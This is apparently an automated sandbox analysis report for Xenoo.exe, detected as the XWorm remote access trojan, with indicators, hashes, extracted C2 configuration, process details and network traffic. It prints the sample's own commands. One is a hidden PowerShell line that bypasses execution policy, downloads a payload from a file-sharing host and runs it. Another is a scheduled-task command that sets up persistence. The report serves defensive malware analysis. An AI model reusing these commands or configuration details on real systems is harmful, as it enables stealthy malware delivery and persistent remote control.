File name:

Xenoo.exe

Full analysis: https://app.any.run/tasks/47e37758-97f4-4c88-96dd-09a1a9a5f269
Verdict: Malicious activity
Threats:

XWorm is a remote access trojan (RAT) sold as a malware-as-a-service. It possesses an extensive hacking toolset and is capable of gathering private information and files from the infected computer, hijacking MetaMask and Telegram accounts, and tracking user activity. XWorm is typically delivered to victims' computers through multi-stage attacks that start with phishing emails.

Analysis date: October 03, 2025, 17:18:19
OS: Windows 10 Professional (build: 19044, 64 bit)
Tags:
github
xworm
upx
golang
Indicators:
MIME: application/vnd.microsoft.portable-executable
File info: PE32+ executable (GUI) x86-64, for MS Windows, 3 sections
MD5:

F2AB5DD33EC70842CF19EE2E7E17E784

SHA1:

9A6117B392FA8B9EE0F8FEA5E99210A90ABCEEDE

SHA256:

19AB88E104756E8D2985646C221F7246C748C635E1EECF25B1B26FDDB2680FD5

SSDEEP:

49152:UWvxZasr/LgDJp+Xlrz6y8YRrLNTaeT0Z1w6qLUjhnO83cxQw2JFW4EDiPSk69Kg:Usra6zgDKXlrz9RfJaeT3WtnT3cxzVRR

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS

    • Run PowerShell with an invisible window

      • powershell.exe (PID: 4776)
    • Changes powershell execution policy (Bypass)

      • Xenoo.exe (PID: 2116)
    • Bypass execution policy to execute commands

      • powershell.exe (PID: 4776)
    • Uses Task Scheduler to run other applications

      • Xenoo.exe (PID: 2116)
    • XWORM has been detected (YARA)

      • Xenoo.exe (PID: 2116)
  • SUSPICIOUS

    • Manipulates environment variables

      • powershell.exe (PID: 4776)
    • Reads the date of Windows installation

      • Xenoo.exe (PID: 2116)
      • MasonKit.com (PID: 4472)
    • Starts POWERSHELL.EXE for commands execution

      • Xenoo.exe (PID: 2116)
    • Reads security settings of Internet Explorer

      • Xenoo.exe (PID: 2116)
      • MasonKit.com (PID: 4472)
    • The process bypasses the loading of PowerShell profile settings

      • Xenoo.exe (PID: 2116)
    • Executes script without checking the security policy

      • powershell.exe (PID: 4776)
    • Downloads file from URI via Powershell

      • powershell.exe (PID: 4776)
    • Executable content was dropped or overwritten

      • powershell.exe (PID: 4776)
      • Xenoo.exe (PID: 2116)
    • Starts process via Powershell

      • powershell.exe (PID: 4776)
    • Starts application with an unusual extension

      • powershell.exe (PID: 4776)
    • Probably UAC bypass using CMSTP.exe (Connection Manager service profile)

      • MasonKit.com (PID: 4472)
    • The process executes via Task Scheduler

      • Xenoo.exe (PID: 1920)
      • Xenoo.exe (PID: 7980)
    • There is functionality for taking screenshot (YARA)

      • Xenoo.exe (PID: 2116)
    • Connects to unusual port

      • Xenoo.exe (PID: 2116)
  • INFO

    • Process checks computer location settings

      • Xenoo.exe (PID: 2116)
      • MasonKit.com (PID: 4472)
    • Reads the machine GUID from the registry

      • Xenoo.exe (PID: 2116)
      • MasonKit.com (PID: 4472)
      • Xenoo.exe (PID: 1920)
      • Xenoo.exe (PID: 7980)
    • Reads the computer name

      • Xenoo.exe (PID: 2116)
      • MasonKit.com (PID: 4472)
      • Xenoo.exe (PID: 1920)
      • Xenoo.exe (PID: 7980)
    • Checks supported languages

      • Xenoo.exe (PID: 2116)
      • MasonKit.com (PID: 4472)
      • Xenoo.exe (PID: 1920)
      • Xenoo.exe (PID: 7980)
    • Disables trace logs

      • powershell.exe (PID: 4776)
      • Xenoo.exe (PID: 2116)
      • cmstp.exe (PID: 6752)
    • Checks proxy server information

      • powershell.exe (PID: 4776)
      • Xenoo.exe (PID: 2116)
      • BackgroundTransferHost.exe (PID: 592)
      • slui.exe (PID: 5584)
    • The executable file from the user directory is run by the Powershell process

      • MasonKit.com (PID: 4472)
    • Creates files or folders in the user directory

      • Xenoo.exe (PID: 2116)
      • BackgroundTransferHost.exe (PID: 592)
    • Reads Environment values

      • Xenoo.exe (PID: 2116)
    • Checks transactions between databases Windows and Oracle

      • cmstp.exe (PID: 6752)
    • Reads the software policy settings

      • Xenoo.exe (PID: 2116)
      • BackgroundTransferHost.exe (PID: 592)
      • slui.exe (PID: 5584)
    • Detects GO elliptic curve encryption (YARA)

      • Xenoo.exe (PID: 2116)
    • Reads security settings of Internet Explorer

      • BackgroundTransferHost.exe (PID: 8112)
      • BackgroundTransferHost.exe (PID: 5904)
      • BackgroundTransferHost.exe (PID: 592)
      • BackgroundTransferHost.exe (PID: 4392)
      • BackgroundTransferHost.exe (PID: 8076)
    • UPX packer has been detected

      • Xenoo.exe (PID: 2116)
    • Application based on Golang

      • Xenoo.exe (PID: 2116)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report

XWorm

(PID) Process(2116) Xenoo.exe
C2grx1pb7pa.local2net.com:7368
Keys
AESMasonRAT
Options
SplitterMasonGroup
USB drop nameINFO.exe
MutexlL2LLJvwmMedmj8d
No Malware configuration.

TRiD

.exe | UPX compressed Win32 Executable (87.1)
.exe | Generic Win/DOS Executable (6.4)
.exe | DOS Executable Generic (6.4)

EXIF

EXE

MachineType: AMD AMD64
TimeStamp: 0000:00:00 00:00:00
ImageFileCharacteristics: Executable, Large address aware
PEType: PE32+
LinkerVersion: 3
CodeSize: 1593344
InitializedDataSize: 4096
UninitializedDataSize: 3588096
EntryPoint: 0x4f0640
OSVersion: 6.1
ImageVersion: 1
SubsystemVersion: 6.1
Subsystem: Windows GUI
No data.
screenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
188
Monitored processes
16
Malicious processes
2
Suspicious processes
0

Behavior graph

Click at the process to see the details

Process information

PID
CMD
Path
Indicators
Parent process
592"BackgroundTransferHost.exe" -ServerName:BackgroundTransferHost.1C:\Windows\System32\BackgroundTransferHost.exe
svchost.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Download/Upload Host
Exit code:
1
Version:
10.0.19041.3636 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\backgroundtransferhost.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\kernel.appcore.dll
c:\windows\system32\bcryptprimitives.dll
1408C:\WINDOWS\system32\DllHost.exe /Processid:{3E5FC7F9-9A51-4367-9063-A120244FBEC7}C:\Windows\System32\dllhost.exesvchost.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
HIGH
Description:
COM Surrogate
Version:
10.0.19041.3636 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\dllhost.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\kernel.appcore.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\bcryptprimitives.dll
1920"C:\Users\admin\AppData\Roaming\Xenoo.exe"C:\Users\admin\AppData\Roaming\Xenoo.exesvchost.exe
User:
admin
Integrity Level:
MEDIUM
Exit code:
0
Modules
Images
c:\users\admin\appdata\roaming\xenoo.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\apphelp.dll
c:\windows\system32\bcryptprimitives.dll
c:\windows\system32\powrprof.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\umpdc.dll
2116"C:\Users\admin\AppData\Local\Temp\Xenoo.exe" C:\Users\admin\AppData\Local\Temp\Xenoo.exe
explorer.exe
User:
admin
Integrity Level:
MEDIUM
Modules
Images
c:\users\admin\appdata\local\temp\xenoo.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\apphelp.dll
c:\windows\system32\bcryptprimitives.dll
c:\windows\system32\powrprof.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\umpdc.dll
XWorm
(PID) Process(2116) Xenoo.exe
C2grx1pb7pa.local2net.com:7368
Keys
AESMasonRAT
Options
SplitterMasonGroup
USB drop nameINFO.exe
MutexlL2LLJvwmMedmj8d
3056"C:\Windows\System32\schtasks.exe" /create /f /sc minute /mo 1 /tn "Xenoo" /tr "C:\Users\admin\AppData\Roaming\Xenoo.exe"C:\Windows\System32\schtasks.exeXenoo.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Task Scheduler Configuration Tool
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\schtasks.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\apphelp.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\combase.dll
4392\??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1C:\Windows\System32\conhost.exepowershell.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Console Window Host
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\conhost.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\shcore.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
4392"BackgroundTransferHost.exe" -ServerName:BackgroundTransferHost.1C:\Windows\System32\BackgroundTransferHost.exesvchost.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Download/Upload Host
Exit code:
1
Version:
10.0.19041.3636 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\backgroundtransferhost.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\kernel.appcore.dll
c:\windows\system32\bcryptprimitives.dll
4472"C:\Users\admin\AppData\Local\Temp\MasonKit.com" C:\Users\admin\AppData\Local\Temp\MasonKit.compowershell.exe
User:
admin
Integrity Level:
MEDIUM
Description:
Exit code:
0
Version:
1.0.0.0
Modules
Images
c:\users\admin\appdata\local\temp\masonkit.com
c:\windows\system32\ntdll.dll
c:\windows\system32\mscoree.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\apphelp.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
4776"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoP -EP Bypass -W Hidden -C "iwr 'https://files.catbox.moe/8ruqew.rar' -OutFile $env:TEMP\MasonKit.com; Start-Process -WindowStyle Hidden $env:TEMP\MasonKit.com"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Xenoo.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\windowspowershell\v1.0\powershell.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\apphelp.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\combase.dll
4860\??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1C:\Windows\System32\conhost.exeschtasks.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Console Window Host
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\conhost.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\shcore.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
Total events
122 906
Read events
122 862
Write events
44
Delete events
0

Modification events

(PID) Process:(2116) Xenoo.exeKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
Operation:writeName:ProxyBypass
Value:
1
(PID) Process:(2116) Xenoo.exeKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
Operation:writeName:IntranetName
Value:
1
(PID) Process:(2116) Xenoo.exeKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
Operation:writeName:UNCAsIntranet
Value:
1
(PID) Process:(2116) Xenoo.exeKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
Operation:writeName:AutoDetect
Value:
0
(PID) Process:(2116) Xenoo.exeKey:HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\Xenoo_RASAPI32
Operation:writeName:EnableFileTracing
Value:
0
(PID) Process:(2116) Xenoo.exeKey:HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\Xenoo_RASAPI32
Operation:writeName:EnableAutoFileTracing
Value:
0
(PID) Process:(2116) Xenoo.exeKey:HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\Xenoo_RASAPI32
Operation:writeName:EnableConsoleTracing
Value:
0
(PID) Process:(2116) Xenoo.exeKey:HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\Xenoo_RASAPI32
Operation:writeName:FileTracingMask
Value:
(PID) Process:(2116) Xenoo.exeKey:HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\Xenoo_RASAPI32
Operation:writeName:ConsoleTracingMask
Value:
(PID) Process:(2116) Xenoo.exeKey:HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\Xenoo_RASAPI32
Operation:writeName:MaxFileSize
Value:
1048576
Executable files
3
Suspicious files
6
Text files
2
Unknown types
0

Dropped files

PID
Process
Filename
Type
592BackgroundTransferHost.exeC:\Users\admin\AppData\Local\Packages\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\AC\BackgroundTransferApi\71951025-dfc4-4675-9192-b43c7479eec5.down_data
MD5:
SHA256:
4776powershell.exeC:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_rfob4rsw.qoy.ps1text
MD5:D17FE0A3F47BE24A6453E9EF58C94641
SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
4776powershell.exeC:\Users\admin\AppData\Local\Temp\MasonKit.comexecutable
MD5:CC08B88C7B9EF35411F7AD9B8952D390
SHA256:83C839FF8E487D87992434BD395FB610CE6238C673C4E798724F2A34B6BB68D4
4776powershell.exeC:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_0efgt4eo.onz.psm1text
MD5:D17FE0A3F47BE24A6453E9EF58C94641
SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
4472MasonKit.comC:\Windows\Temp\4nymbd5t.inftext
MD5:2E3C94EDA3DCF37547263F5D1DABBAB0
SHA256:C011E6AD8B55ACF3D483F9691FC64C5F1E41BFBEDE6015E5632C0D7AFD7EDA1F
4776powershell.exeC:\Users\admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractivebinary
MD5:A333C5B6B57CFC1F16976A96D775250B
SHA256:61F9EAA056B661D4A744C01E10BE502C0927277A1F91D5CD84D791BC9E681DCB
2116Xenoo.exeC:\Users\admin\AppData\Roaming\Xenoo.exeexecutable
MD5:F2AB5DD33EC70842CF19EE2E7E17E784
SHA256:19AB88E104756E8D2985646C221F7246C748C635E1EECF25B1B26FDDB2680FD5
592BackgroundTransferHost.exeC:\Users\admin\AppData\Local\Packages\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\AC\Microsoft\CryptnetUrlCache\Content\26C212D9399727259664BDFCA073966E_F9F7D6A7ECE73106D2A8C63168CDA10Dbinary
MD5:A2459D8C15651BB81784468BC907C939
SHA256:E6360479BE8038E7443DA1855F01EC552F1B602A656A2BF713C1CD760B7CB6C8
592BackgroundTransferHost.exeC:\Users\admin\AppData\Local\Packages\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\AC\Microsoft\CryptnetUrlCache\MetaData\26C212D9399727259664BDFCA073966E_F9F7D6A7ECE73106D2A8C63168CDA10Dbinary
MD5:29335F75AB0D258E4594C52DF700C881
SHA256:5D5823FDE962576DFD58457FD1CD1884F8B9B0622967C5B8EFACF5B08C53181C
592BackgroundTransferHost.exeC:\Users\admin\AppData\Local\Packages\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\AC\BackgroundTransferApi\58118c5a-42a5-4b79-aca1-ff1f4e654256.up_meta_securebinary
MD5:46C4DE80FC1BAE89CE43BDBE58DEC947
SHA256:929CCE12AE5F6F18B8464EC5511E5957895D9A98EEF10AD73A73D76D1FBF16EB
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
6
TCP/UDP connections
136
DNS requests
20
Threats
5

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
4352
svchost.exe
GET
200
2.17.190.73:80
http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBSAUQYBMq2awn1Rh6Doh%2FsBYgFV7gQUA95QNVbRTLtm8KPiGxvDl7I90VUCEAJ0LqoXyo4hxxe7H%2Fz9DKA%3D
DE
binary
471 b
whitelisted
4352
svchost.exe
GET
200
2.17.190.73:80
http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBSAUQYBMq2awn1Rh6Doh%2FsBYgFV7gQUA95QNVbRTLtm8KPiGxvDl7I90VUCEAJ0LqoXyo4hxxe7H%2Fz9DKA%3D
DE
binary
471 b
whitelisted
5320
backgroundTaskHost.exe
GET
200
2.17.190.73:80
http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBTrjrydRyt%2BApF3GSPypfHBxR5XtQQUs9tIpPmhxdiuNkHMEWNpYim8S8YCEAI5PUjXAkJafLQcAAsO18o%3D
DE
binary
313 b
whitelisted
6788
backgroundTaskHost.exe
GET
200
2.17.190.73:80
http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBQ50otx%2Fh0Ztl%2Bz8SiPI7wEWVxDlQQUTiJUIBiV5uNu5g%2F6%2BrkS7QYXjzkCEAn5bsKVVV8kdJ6vHl3O1J0%3D
DE
binary
471 b
whitelisted
592
BackgroundTransferHost.exe
GET
200
2.17.190.73:80
http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBTrjrydRyt%2BApF3GSPypfHBxR5XtQQUs9tIpPmhxdiuNkHMEWNpYim8S8YCEAI5PUjXAkJafLQcAAsO18o%3D
DE
binary
313 b
whitelisted
6864
backgroundTaskHost.exe
GET
200
2.17.190.73:80
http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBQ50otx%2Fh0Ztl%2Bz8SiPI7wEWVxDlQQUTiJUIBiV5uNu5g%2F6%2BrkS7QYXjzkCEAn5bsKVVV8kdJ6vHl3O1J0%3D
DE
binary
471 b
whitelisted
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
2164
RUXIMICS.exe
51.104.136.2:443
settings-win.data.microsoft.com
MICROSOFT-CORP-MSN-AS-BLOCK
IE
whitelisted
4
System
192.168.100.255:137
whitelisted
6016
MoUsoCoreWorker.exe
51.104.136.2:443
settings-win.data.microsoft.com
MICROSOFT-CORP-MSN-AS-BLOCK
IE
whitelisted
4
System
192.168.100.255:138
whitelisted
4776
powershell.exe
108.181.20.35:443
files.catbox.moe
TELUS Communications
CA
whitelisted
2116
Xenoo.exe
185.199.111.133:443
raw.githubusercontent.com
FASTLY
US
whitelisted
5224
SearchApp.exe
92.123.104.13:443
www.bing.com
Akamai International B.V.
DE
whitelisted
4352
svchost.exe
20.190.159.131:443
login.live.com
MICROSOFT-CORP-MSN-AS-BLOCK
IE
whitelisted
4352
svchost.exe
2.17.190.73:80
ocsp.digicert.com
AKAMAI-AS
DE
whitelisted
5320
backgroundTaskHost.exe
92.123.104.13:443
www.bing.com
Akamai International B.V.
DE
whitelisted

DNS requests

Domain
IP
Reputation
settings-win.data.microsoft.com
  • 51.104.136.2
  • 51.124.78.146
whitelisted
google.com
  • 216.58.206.78
whitelisted
files.catbox.moe
  • 108.181.20.35
unknown
raw.githubusercontent.com
  • 185.199.111.133
  • 185.199.109.133
  • 185.199.110.133
  • 185.199.108.133
whitelisted
www.bing.com
  • 92.123.104.13
  • 92.123.104.66
  • 92.123.104.9
  • 92.123.104.67
  • 92.123.104.14
  • 92.123.104.65
  • 92.123.104.12
  • 92.123.104.6
  • 92.123.104.5
whitelisted
login.live.com
  • 20.190.159.131
  • 40.126.31.0
  • 40.126.31.128
  • 20.190.159.71
  • 40.126.31.2
  • 40.126.31.131
  • 20.190.159.0
  • 20.190.159.73
whitelisted
ocsp.digicert.com
  • 2.17.190.73
whitelisted
client.wns.windows.com
  • 172.211.123.250
whitelisted
arc.msn.com
  • 20.31.169.57
whitelisted
fd.api.iris.microsoft.com
  • 20.199.58.43
  • 20.103.156.88
whitelisted

Threats

PID
Process
Class
Message
4776
powershell.exe
Potentially Bad Traffic
ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)
2428
svchost.exe
Not Suspicious Traffic
INFO [ANY.RUN] Attempting to access raw user content on GitHub
Potential Corporate Privacy Violation
ET INFO PE EXE or DLL Windows file download HTTP
Not Suspicious Traffic
ET INFO Windows Powershell User-Agent Usage
Unknown Traffic
ET USER_AGENTS Microsoft Dr Watson User-Agent (MSDW)
No debug info